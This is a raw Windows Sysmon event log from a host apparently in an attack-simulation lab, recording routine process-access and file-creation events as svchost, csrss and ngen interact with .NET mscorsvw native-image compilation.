13:47:38.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.765{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.765{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.530{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917A-6005-9F02-00000000A301}3768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.515{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-917A-6005-9F02-00000000A301}3768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:38.515{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917A-6005-9F02-00000000A301}3768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:38.452{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1068-0\System.Security.dll2021-01-18 13:47:38.437 10341000x80000000000000006820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.515{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.515{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917B-6005-A102-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.421{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917B-6005-A102-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.421{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917B-6005-A102-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:39.343{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\5e8-0\System.ServiceModel.Activation.dll2021-01-18 13:47:39.343 10341000x80000000000000006834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.812{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.796{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.796{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A502-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.655{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A502-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.655{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A502-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:41.593{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9d0-0\System.ServiceModel.Channels.dll2021-01-18 13:47:41.593 10341000x80000000000000006827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.233{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.218{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.218{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A302-00000000A301}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.140{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A302-00000000A301}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.140{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A302-00000000A301}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:41.030{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b7c-0\System.ServiceModel.Activities.dll2021-01-18 13:47:41.030 10341000x80000000000000006841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 